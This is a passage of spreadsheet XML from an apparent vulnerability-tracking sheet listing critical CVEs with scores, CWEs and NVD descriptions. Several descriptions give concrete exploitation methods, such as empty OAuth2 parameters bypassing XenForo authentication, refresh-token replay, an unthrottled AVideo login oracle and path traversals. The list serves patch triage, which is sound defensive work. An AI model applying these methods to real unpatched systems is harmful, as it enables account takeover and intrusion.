s="5" t="inlineStr" /><c r="J77" s="5" t="inlineStr" /><c r="K77" s="5" t="inlineStr" /><c r="L77" s="5" t="inlineStr" /><c r="M77" s="5" t="inlineStr" /><c r="N77" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O77" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P77" s="5" t="inlineStr"><is><t>2026-09-10</t></is></c><c r="Q77" s="5" t="inlineStr" /><c r="R77" s="5" t="inlineStr"><is><t>CWE-79</t></is></c><c r="S77" s="5" t="inlineStr"><is><t>Improper neutralization of input during web page generation ('cross-site scripting') in Microsoft Exchange Server allows an unauthorized attacker to perform spoofing over a network.</t></is></c><c r="T77" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69356</t></is></c></row><row r="78"><c r="A78" s="5" t="inlineStr"><is><t>P2 - High</t></is></c><c r="B78" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C78" s="5" t="inlineStr"><is><t>CVE-2026-76200</t></is></c><c r="D78" s="5" t="n"><v>9.300000000000001</v></c><c r="E78" s="5" t="inlineStr"><is><t>CRITICAL</t></is></c><c r="F78" s="5" t="inlineStr"><is><t>psirt@adobe.com</t></is></c><c r="G78" s="5" t="inlineStr" /><c r="H78" s="5" t="n"><v>0.005</v></c><c r="I78" s="5" t="inlineStr" /><c r="J78" s="5" t="inlineStr" /><c r="K78" s="5" t="inlineStr"><is><t>adobe:commerce, adobe:commerce_b2b, adobe:magento</t></is></c><c r="L78" s="5" t="inlineStr" /><c r="M78" s="5" t="inlineStr" /><c r="N78" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O78" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P78" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q78" s="5" t="inlineStr" /><c r="R78" s="5" t="inlineStr"><is><t>CWE-79</t></is></c><c r="S78" s="5" t="inlineStr"><is><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is></c><c r="T78" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-76200</t></is></c></row><row r="79"><c r="A79" s="5" t="inlineStr"><is><t>P2 - High</t></is></c><c r="B79" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C79" s="5" t="inlineStr"><is><t>CVE-2026-76201</t></is></c><c r="D79" s="5" t="n"><v>9.300000000000001</v></c><c r="E79" s="5" t="inlineStr"><is><t>CRITICAL</t></is></c><c r="F79" s="5" t="inlineStr"><is><t>psirt@adobe.com</t></is></c><c r="G79" s="5" t="inlineStr" /><c r="H79" s="5" t="n"><v>0.005</v></c><c r="I79" s="5" t="inlineStr" /><c r="J79" s="5" t="inlineStr" /><c r="K79" s="5" t="inlineStr"><is><t>adobe:commerce, adobe:commerce_b2b, adobe:magento</t></is></c><c r="L79" s="5" t="inlineStr" /><c r="M79" s="5" t="inlineStr" /><c r="N79" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O79" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P79" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q79" s="5" t="inlineStr" /><c r="R79" s="5" t="inlineStr"><is><t>CWE-79</t></is></c><c r="S79" s="5" t="inlineStr"><is><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is></c><c r="T79" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-76201</t></is></c></row><row r="80"><c r="A80" s="5" t="inlineStr"><is><t>P2 - High</t></is></c><c r="B80" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C80" s="5" t="inlineStr"><is><t>CVE-2026-78997</t></is></c><c r="D80" s="5" t="n"><v>9.300000000000001</v></c><c r="E80" s="5" t="inlineStr"><is><t>CRITICAL</t></is></c><c r="F80" s="5" t="inlineStr"><is><t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t></is></c><c r="G80" s="5" t="inlineStr" /><c r="H80" s="5" t="n"><v>0.003</v></c><c r="I80" s="5" t="inlineStr" /><c r="J80" s="5" t="inlineStr" /><c r="K80" s="5" t="inlineStr" /><c r="L80" s="5" t="inlineStr" /><c r="M80" s="5" t="inlineStr" /><c r="N80" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O80" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P80" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q80" s="5" t="inlineStr" /><c r="R80" s="5" t="inlineStr"><is><t>CWE-79</t></is></c><c r="S80" s="5" t="inlineStr"><is><t>UC Browser for Android (package com.UCMobile.intl, version 13.7.8.1314) contains a Universal Cross-Site Scripting vulnerability that allows an attacker to execute arbitrary JavaScript in the context of any origin. An attacker hosts a specially crafted URL on a UC-owned domain (via a reflected XSS) that leverages the browser's internal JavaScript bridge to register a deferred callback, navigate the tab to a victim site, and then execute attacker-controlled code on that site when a login dialog is dismissed.</t></is></c><c r="T80" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-78997</t></is></c></row><row r="81"><c r="A81" s="5" t="inlineStr"><is><t>P2 - High</t></is></c><c r="B81" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C81" s="5" t="inlineStr"><is><t>CVE-2026-67367</t></is></c><c r="D81" s="5" t="n"><v>9.199999999999999</v></c><c r="E81" s="5" t="inlineStr"><is><t>CRITICAL</t></is></c><c r="F81" s="5" t="inlineStr"><is><t>productcert@siemens.com</t></is></c><c r="G81" s="5" t="inlineStr" /><c r="H81" s="5" t="n"><v>0.008</v></c><c r="I81" s="5" t="inlineStr" /><c r="J81" s="5" t="inlineStr" /><c r="K81" s="5" t="inlineStr" /><c r="L81" s="5" t="inlineStr" /><c r="M81" s="5" t="inlineStr" /><c r="N81" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O81" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P81" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q81" s="5" t="inlineStr" /><c r="R81" s="5" t="inlineStr"><is><t>CWE-23</t></is></c><c r="S81" s="5" t="inlineStr"><is><t>A vulnerability has been identified in SIMOVE Fleetmanager V3.1 (All versions &lt; V3.1.13), SIMOVE Fleetmanager V3.2 (All versions &lt; V3.2.4), SIMOVE Fleetmanager V3.3 (All versions &lt; V3.3.2), SIMOVE Fleetmanager V4.0 (All versions &lt; V4.0.1), SIPLANT V1.7 (All versions), SIPLANT V2.2 (All versions), SIPLANT V3.0 (All versions), SIPLANT V3.1 (All versions &lt; V3.1.4). Affected devices do not properly validate and neutralize directory traversal sequences in the file-serving endpoint of the embedded HTTP server. This could allow an unauthenticated remote attacker to read arbitrary files from the underlying operating system without any credentials, potentially exposing sensitive data such as credential stores, private keys, and configuration secrets.</t></is></c><c r="T81" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-67367</t></is></c></row><row r="82"><c r="A82" s="5" t="inlineStr"><is><t>P2 - High</t></is></c><c r="B82" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C82" s="5" t="inlineStr"><is><t>CVE-2026-82067</t></is></c><c r="D82" s="5" t="n"><v>9.199999999999999</v></c><c r="E82" s="5" t="inlineStr"><is><t>CRITICAL</t></is></c><c r="F82" s="5" t="inlineStr"><is><t>cna@mongodb.com</t></is></c><c r="G82" s="5" t="inlineStr" /><c r="H82" s="5" t="n"><v>0.003</v></c><c r="I82" s="5" t="inlineStr" /><c r="J82" s="5" t="inlineStr"><is><t>mongodb</t></is></c><c r="K82" s="5" t="inlineStr"><is><t>mongodb:mongodb</t></is></c><c r="L82" s="5" t="inlineStr" /><c r="M82" s="5" t="inlineStr" /><c r="N82" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O82" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P82" s="5" t="inlineStr"><is><t>2026-09-16</t></is></c><c r="Q82" s="5" t="inlineStr" /><c r="R82" s="5" t="inlineStr"><is><t>CWE-178</t></is></c><c r="S82" s="5" t="inlineStr"><is><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is></c><c r="T82" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-82067</t></is></c></row><row r="83"><c r="A83" s="5" t="inlineStr"><is><t>P2 - High</t></is></c><c r="B83" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C83" s="5" t="inlineStr"><is><t>CVE-2026-84197</t></is></c><c r="D83" s="5" t="n"><v>9.199999999999999</v></c><c r="E83" s="5" t="inlineStr"><is><t>CRITICAL</t></is></c><c r="F83" s="5" t="inlineStr"><is><t>emo@eclipse.org</t></is></c><c r="G83" s="5" t="inlineStr" /><c r="H83" s="5" t="n"><v>0.002</v></c><c r="I83" s="5" t="inlineStr" /><c r="J83" s="5" t="inlineStr" /><c r="K83" s="5" t="inlineStr" /><c r="L83" s="5" t="inlineStr" /><c r="M83" s="5" t="inlineStr" /><c r="N83" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O83" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P83" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q83" s="5" t="inlineStr" /><c r="R83" s="5" t="inlineStr"><is><t>CWE-295, CWE-297, CWE-300</t></is></c><c r="S83" s="5" t="inlineStr"><is><t>In Eclipse Ditto's Node.js JavaScript client, all released versions of @eclipse-ditto/ditto-javascript-client-node from 2.0.0 to 3.9.0 and of its predecessor package @eclipse-ditto/ditto-javascript-client-node_1.0 from 1.0.0 to 2.1.0, the WebSocket transport hard-codes rejectUnauthorized: false when creating the underlying ws WebSocket. Certificate chain and hostname validation are therefore disabled for every wss:// connection, and no builder option, constructor argument or environment variable lets an application turn validation back on. An attacker in a position to intercept the connection can present an arbitrary certificate, complete the TLS handshake, read the credentials that the configured authentication provider sends in the Authorization header of the WebSocket upgrade request, and read, alter or inject Ditto Protocol messages for the lifetime of the connection. The Java client, the browser/DOM JavaScript client and the HTTP transport of the Node.js client are not affected.</t></is></c><c r="T83" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-84197</t></is></c></row><row r="84"><c r="A84" s="5" t="inlineStr"><is><t>P2 - High</t></is></c><c r="B84" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C84" s="5" t="inlineStr"><is><t>CVE-2026-62646</t></is></c><c r="D84" s="5" t="n"><v>9.1</v></c><c r="E84" s="5" t="inlineStr"><is><t>CRITICAL</t></is></c><c r="F84" s="5" t="inlineStr"><is><t>productcert@siemens.com</t></is></c><c r="G84" s="5" t="inlineStr" /><c r="H84" s="5" t="n"><v>0.003</v></c><c r="I84" s="5" t="inlineStr" /><c r="J84" s="5" t="inlineStr" /><c r="K84" s="5" t="inlineStr" /><c r="L84" s="5" t="inlineStr" /><c r="M84" s="5" t="inlineStr" /><c r="N84" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O84" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P84" s="5" t="inlineStr"><is><t>2026-09-10</t></is></c><c r="Q84" s="5" t="inlineStr" /><c r="R84" s="5" t="inlineStr"><is><t>CWE-331</t></is></c><c r="S84" s="5" t="inlineStr"><is><t>A vulnerability has been identified in Reyrolle 7SR5 (All versions &lt; V2.70). A session identifier is generated using an algorithm with insufficient randomness, resulting in a token with low entropy that can be predicted or brute-forced within a feasible number of attempts. This could allow an unauthenticated remote attacker to derive valid session identifiers and bypass authentication.</t></is></c><c r="T84" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-62646</t></is></c></row><row r="85"><c r="A85" s="5" t="inlineStr"><is><t>P2 - High</t></is></c><c r="B85" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C85" s="5" t="inlineStr"><is><t>CVE-2026-69641</t></is></c><c r="D85" s="5" t="n"><v>9.1</v></c><c r="E85" s="5" t="inlineStr"><is><t>CRITICAL</t></is></c><c r="F85" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G85" s="5" t="inlineStr" /><c r="H85" s="5" t="n"><v>0.008</v></c><c r="I85" s="5" t="inlineStr" /><c r="J85" s="5" t="inlineStr" /><c r="K85" s="5" t="inlineStr" /><c r="L85" s="5" t="inlineStr" /><c r="M85" s="5" t="inlineStr" /><c r="N85" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O85" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P85" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q85" s="5" t="inlineStr" /><c r="R85" s="5" t="inlineStr"><is><t>CWE-862</t></is></c><c r="S85" s="5" t="inlineStr"><is><t>Missing authorization in Microsoft Exchange Server allows an authorized attacker to elevate privileges over a network.</t></is></c><c r="T85" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69641</t></is></c></row><row r="86"><c r="A86" s="5" t="inlineStr"><is><t>P2 - High</t></is></c><c r="B86" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C86" s="5" t="inlineStr"><is><t>CVE-2026-73309</t></is></c><c r="D86" s="5" t="n"><v>9.1</v></c><c r="E86" s="5" t="inlineStr"><is><t>CRITICAL</t></is></c><c r="F86" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="G86" s="5" t="inlineStr" /><c r="H86" s="5" t="n"><v>0.005</v></c><c r="I86" s="5" t="inlineStr" /><c r="J86" s="5" t="inlineStr" /><c r="K86" s="5" t="inlineStr"><is><t>xenforo:xenforo</t></is></c><c r="L86" s="5" t="inlineStr" /><c r="M86" s="5" t="inlineStr" /><c r="N86" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O86" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P86" s="5" t="inlineStr"><is><t>2026-09-11</t></is></c><c r="Q86" s="5" t="inlineStr" /><c r="R86" s="5" t="inlineStr"><is><t>CWE-697</t></is></c><c r="S86" s="5" t="inlineStr"><is><t>XenForo before 2.3.13 contains an authentication bypass vulnerability in the OAuth2 token endpoint that allows unauthenticated attackers to obtain valid token pairs by submitting empty values for client_secret and code_verifier parameters. Attackers can exploit PHP truthy evaluation logic, which treats empty strings as false and skips client secret validation and PKCE code verifier validation, to exchange a valid authorization code for a token pair without proving client identity or holding the PKCE commitment.</t></is></c><c r="T86" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-73309</t></is></c></row><row r="87"><c r="A87" s="5" t="inlineStr"><is><t>P2 - High</t></is></c><c r="B87" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C87" s="5" t="inlineStr"><is><t>CVE-2026-73311</t></is></c><c r="D87" s="5" t="n"><v>9.1</v></c><c r="E87" s="5" t="inlineStr"><is><t>CRITICAL</t></is></c><c r="F87" s="5" t="inlineStr"><is><t>disclosure@vulncheck.com</t></is></c><c r="G87" s="5" t="inlineStr" /><c r="H87" s="5" t="n"><v>0.004</v></c><c r="I87" s="5" t="inlineStr" /><c r="J87" s="5" t="inlineStr" /><c r="K87" s="5" t="inlineStr"><is><t>xenforo:xenforo</t></is></c><c r="L87" s="5" t="inlineStr" /><c r="M87" s="5" t="inlineStr" /><c r="N87" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O87" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P87" s="5" t="inlineStr"><is><t>2026-09-11</t></is></c><c r="Q87" s="5" t="inlineStr" /><c r="R87" s="5" t="inlineStr"><is><t>CWE-294</t></is></c><c r="S87" s="5" t="inlineStr"><is><t>XenForo before 2.3.13 contains an OAuth2 authorization code reuse vulnerability that allows attackers to obtain unauthorized token pairs by submitting a previously used authorization code. Attackers can exploit the failure to invalidate or mark authorization codes as consumed after initial token issuance to receive an independent token pair for the same user and scopes, bypassing the single-use guarantee of the OAuth2 authorization code flow.</t></is></c><c r="T87" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-73311</t></is></c></row><row r="88"><c r="A88" s="5" t="inlineStr"><is><t>P2 - High</t></is></c><c r="B88" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C88" s="5" t="inlineStr"><is><t>CVE-2026-73312</t></is></c><c r="D88" s="5" t="n"><v>9.1</v></c><c r="E88" s="5" t="inlineStr"><is><t>CRITICAL</t></is></c><c r="F88" s="5" t="inlineStr"><is><t>disclosure@vulncheck.com</t></is></c><c r="G88" s="5" t="inlineStr" /><c r="H88" s="5" t="n"><v>0.004</v></c><c r="I88" s="5" t="inlineStr" /><c r="J88" s="5" t="inlineStr" /><c r="K88" s="5" t="inlineStr"><is><t>xenforo:xenforo</t></is></c><c r="L88" s="5" t="inlineStr" /><c r="M88" s="5" t="inlineStr" /><c r="N88" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O88" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P88" s="5" t="inlineStr"><is><t>2026-09-11</t></is></c><c r="Q88" s="5" t="inlineStr" /><c r="R88" s="5" t="inlineStr"><is><t>CWE-294</t></is></c><c r="S88" s="5" t="inlineStr"><is><t>XenForo before 2.3.13 contains a refresh token replay vulnerability that allows attackers to reuse a refresh token multiple times by exploiting the failure to mark tokens as consumed when the parent access token has expired. Attackers can repeatedly submit the same refresh token to generate additional independent token pairs, achieving persistent unauthorized access for the token's full lifetime.</t></is></c><c r="T88" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-73312</t></is></c></row><row r="89"><c r="A89" s="5" t="inlineStr"><is><t>P2 - High</t></is></c><c r="B89" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C89" s="5" t="inlineStr"><is><t>CVE-2026-75156</t></is></c><c r="D89" s="5" t="n"><v>9.1</v></c><c r="E89" s="5" t="inlineStr"><is><t>CRITICAL</t></is></c><c r="F89" s="5" t="inlineStr"><is><t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t></is></c><c r="G89" s="5" t="inlineStr" /><c r="H89" s="5" t="n"><v>0.002</v></c><c r="I89" s="5" t="inlineStr" /><c r="J89" s="5" t="inlineStr" /><c r="K89" s="5" t="inlineStr" /><c r="L89" s="5" t="inlineStr" /><c r="M89" s="5" t="inlineStr" /><c r="N89" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O89" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P89" s="5" t="inlineStr"><is><t>2026-09-16</t></is></c><c r="Q89" s="5" t="inlineStr" /><c r="R89" s="5" t="inlineStr"><is><t>CWE-346</t></is></c><c r="S89" s="5" t="inlineStr"><is><t>Apache Airflow FAB provider versions 3.7.3 through 3.8.0 do not validate the issuer or audience of Azure AD `id_token`s during OAuth login. Deployments are affected only when the FAB auth manager is configured with Azure AD as an OAuth provider. Because the signing keys are fetched from Microsoft's **multi-tenant** JWKS endpoint, an `id_token` minted in *any* Azure tenant — including one the attacker creates — passes signature verification, and the username and role assignments are then read from that attacker-controlled token. Anyone able to register an Azure tenant can therefore authenticate to the Airflow UI with no prior access to the deployment.

The fix for **CVE-2026-59243** was incomplete, and this advisory closes the remaining gap: that fix made the provider verify the `id_token` signature, but did not add issuer or audience checks. Operators who already applied the CVE-2026-59243 fix are **still affected and must upgrade again** — 3.7.3 is the release that shipped that fix, so every version containing it falls inside this affected range. Upgrade to apache-airflow-providers-fab `3.8.1` or later.</t></is></c><c r="T89" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-75156</t></is></c></row><row r="90"><c r="A90" s="5" t="inlineStr"><is><t>P2 - High</t></is></c><c r="B90" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C90" s="5" t="inlineStr"><is><t>CVE-2026-75746</t></is></c><c r="D90" s="5" t="n"><v>9.1</v></c><c r="E90" s="5" t="inlineStr"><is><t>CRITICAL</t></is></c><c r="F90" s="5" t="inlineStr"><is><t>psirt@adobe.com</t></is></c><c r="G90" s="5" t="inlineStr" /><c r="H90" s="5" t="n"><v>0.011</v></c><c r="I90" s="5" t="inlineStr" /><c r="J90" s="5" t="inlineStr" /><c r="K90" s="5" t="inlineStr" /><c r="L90" s="5" t="inlineStr" /><c r="M90" s="5" t="inlineStr" /><c r="N90" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O90" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P90" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q90" s="5" t="inlineStr" /><c r="R90" s="5" t="inlineStr"><is><t>CWE-89</t></is></c><c r="S90" s="5" t="inlineStr"><is><t>ColdFusion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code. Exploitation of this issue does not require user interaction. Scope is changed.</t></is></c><c r="T90" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-75746</t></is></c></row><row r="91"><c r="A91" s="5" t="inlineStr"><is><t>P2 - High</t></is></c><c r="B91" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C91" s="5" t="inlineStr"><is><t>CVE-2026-79571</t></is></c><c r="D91" s="5" t="n"><v>9.1</v></c><c r="E91" s="5" t="inlineStr"><is><t>CRITICAL</t></is></c><c r="F91" s="5" t="inlineStr"><is><t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t></is></c><c r="G91" s="5" t="inlineStr" /><c r="H91" s="5" t="n"><v>0.003</v></c><c r="I91" s="5" t="inlineStr" /><c r="J91" s="5" t="inlineStr"><is><t>spring</t></is></c><c r="K91" s="5" t="inlineStr" /><c r="L91" s="5" t="inlineStr" /><c r="M91" s="5" t="inlineStr" /><c r="N91" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O91" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P91" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q91" s="5" t="inlineStr" /><c r="R91" s="5" t="inlineStr"><is><t>CWE-284</t></is></c><c r="S91" s="5" t="inlineStr"><is><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is></c><c r="T91" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-79571</t></is></c></row><row r="92"><c r="A92" s="5" t="inlineStr"><is><t>P2 - High</t></is></c><c r="B92" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C92" s="5" t="inlineStr"><is><t>CVE-2026-86729</t></is></c><c r="D92" s="5" t="n"><v>9.1</v></c><c r="E92" s="5" t="inlineStr"><is><t>CRITICAL</t></is></c><c r="F92" s="5" t="inlineStr"><is><t>disclosure@vulncheck.com</t></is></c><c r="G92" s="5" t="inlineStr" /><c r="H92" s="5" t="n"><v>0.002</v></c><c r="I92" s="5" t="inlineStr" /><c r="J92" s="5" t="inlineStr" /><c r="K92" s="5" t="inlineStr" /><c r="L92" s="5" t="inlineStr" /><c r="M92" s="5" t="inlineStr" /><c r="N92" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O92" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P92" s="5" t="inlineStr"><is><t>2026-09-10</t></is></c><c r="Q92" s="5" t="inlineStr" /><c r="R92" s="5" t="inlineStr"><is><t>CWE-307</t></is></c><c r="S92" s="5" t="inlineStr"><is><t>WWBN AVideo through commit e01e41ecc (no patched version available) exposes get_api_preauthorize in plugin/API/API.php as a second, undocumented login path. Unlike get_api_signIn, which enforces a rate limit of 10 attempts per 5 minutes via checkRateLimit(), get_api_preauthorize performs the same credential check with no throttling for any client, allowing unlimited remote password guessing against arbitrary accounts, including admin. The endpoint also acts as a credential oracle: it returns the message "Invalid credentials" for both correct and incorrect passwords, while the users_id field in the response body discloses the authenticated identity (users_id:1 on success, users_id:0 on failure), and a correct password establishes a session cookie that remains usable for authenticated API requests. Together these issues permit unauthenticated brute-force account takeover.</t></is></c><c r="T92" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-86729</t></is></c></row><row r="93"><c r="A93" s="5" t="inlineStr"><is><t>P2 - High</t></is></c><c r="B93" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C93" s="5" t="inlineStr"><is><t>CVE-2026-86840</t></is></c><c r="D93" s="5" t="n"><v>9.1</v></c><c r="E93" s="5" t="inlineStr"><is><t>CRITICAL</t></is></c><c r="F93" s="5" t="inlineStr"><is><t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t></is></c><c r="G93" s="5" t="inlineStr" /><c r="H93" s="5" t="n"><v>0.002</v></c><c r="I93" s="5" t="inlineStr" /><c r="J93" s="5" t="inlineStr" /><c r="K93" s="5" t="inlineStr" /><c r="L93" s="5" t="inlineStr" /><c r="M93" s="5" t="inlineStr" /><c r="N93" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O93" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P93" s="5" t="inlineStr"><is><t>2026-09-10</t></is></c><c r="Q93" s="5" t="inlineStr" /><c r="R93" s="5" t="inlineStr"><is><t>CWE-639, CWE-862</t></is></c><c r="S93" s="5" t="inlineStr"><is><t>The `vtoken-minting` and `slpx` pallets in Bifrost contain an improper authorization vulnerability in channel commission attribution. A signed account can supply an arbitrary registered `channel_id` when minting tokens without verifying that the caller is authorized to mint on behalf of that channel. This allows an attacker to inflate a channel's recorded mint volume and cause protocol commission payments to be disproportionately distributed to that channel during commission settlement.</t></is></c><c r="T93" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-86840</t></is></c></row><row r="94"><c r="A94" s="5" t="inlineStr"><is><t>P2 - High</t></is></c><c r="B94" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C94" s="5" t="inlineStr"><is><t>CVE-2026-53581</t></is></c><c r="D94" s="5" t="n"><v>9</v></c><c r="E94" s="5" t="inlineStr"><is><t>CRITICAL</t></is></c><c r="F94" s="5" t="inlineStr"><is><t>security-advisories@github.com</t></is></c><c r="G94" s="5" t="inlineStr" /><c r="H94" s="5" t="n"><v>0.003</v></c><c r="I94" s="5" t="inlineStr" /><c r="J94" s="5" t="inlineStr" /><c r="K94" s="5" t="inlineStr" /><c r="L94" s="5" t="inlineStr" /><c r="M94" s="5" t="inlineStr" /><c r="N94" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O94" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P94" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q94" s="5" t="inlineStr" /><c r="R94" s="5" t="inlineStr"><is><t>CWE-22, CWE-73</t></is></c><c r="S94" s="5" t="inlineStr"><is><t>OPNsense is a FreeBSD based firewall and routing platform. Prior to version 26.1.9 of opnsense/core and version 26.4_20 of BE/opnsense/core, a path traversal vulnerability in the NTP configuration module allows an attacker to overwrite arbitrary files on the system as the root user. By manipulating the GPS or PPS serial port parameter, an attacker with access to the NTP configuration can escape the intended directory and force the system to write user-controlled data to any file on the filesystem. Version 26.1.9 of opnsense/core and version 26.4_20 of BE/opnsense/core patch the issue.</t></is></c><c r="T94" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-53581</t></is></c></row><row r="95"><c r="A95" s="5" t="inlineStr"><is><t>P2 - High</t></is></c><c r="B95" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C95" s="5" t="inlineStr"><is><t>CVE-2026-66768</t></is></c><c r="D95" s="5" t="n"><v>9</v></c><c r="E95" s="5" t="inlineStr"><is><t>CRITICAL</t></is></c><c r="F95" s="5" t="inlineStr"><is><t>cna@sap.com</t></is></c><c r="G95" s="5" t="inlineStr" /><c r="H95" s="5" t="n"><v>0.003</v></c><c r="I95" s="5" t="inlineStr" /><c r="J95" s="5" t="inlineStr"><is><t>sap</t></is></c><c r="K95" s="5" t="inlineStr" /><c r="L95" s="5" t="inlineStr" /><c r="M95" s="5" t="inlineStr" /><c r="N95" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O95" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P95" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q95" s="5" t="inlineStr" /><c r="R95" s="5" t="inlineStr"><is><t>CWE-807</t></is></c><c r="S95" s="5" t="inlineStr"><is><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is></c><c r="T95" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-66768</t></is></c></row><row r="96"><c r="A96" s="5" t="inlineStr"><is><t>P2 - High</t></is></c><c r="B96" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C96" s="5" t="inlineStr"><is><t>CVE-2026-67378</t></is></c><c r="D96" s="5" t="n"><v>9</v></c><c r="E96" s="5" t="inlineStr"><is><t>CRITICAL</t></is></c><c r="F96" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="G96" s="5" t="inlineStr" /><c r="H96" s="5" t="n"><v>0.005</v></c><c r="I96" s="5" t="inlineStr" /><c r="J96" s="5" t="inlineStr"><is><t>microsoft:sql_server</t></is></c><c r="K96" s="5" t="inlineStr"><is><t>microsoft:sql_server_2019, microsoft:sql_server_2022, microsoft:sql_server_2025</t></is></c><c r="L96" s="5" t="inlineStr" /><c r="M96" s="5" t="inlineStr" /><c r="N96" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O96" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P96" s="5" t="inlineStr"><is><t>2026-09-17</t></is></c><c r="Q96" s="5" t="inlineStr" /><c r="R96" s="5" t="inlineStr"><is><t>CWE-822</t></is></c><c r="S96" s="5" t="inlineStr"><is><t>Untrusted pointer dereference in SQL Server allows an unauthorized attacker to execute code over a network.</t></is></c><c r="T96" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-67378</t></is></c></row><row r="97"><c r="A97" s="5" t="inlineStr"><is><t>P2 - High</t></is></c><c r="B97" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C97" s="5" t="inlineStr"><is><t>CVE-2026-67636</t></is></c><c r="D97" s="5" t="n"><v>9</v></c><c r="E97" s="5" 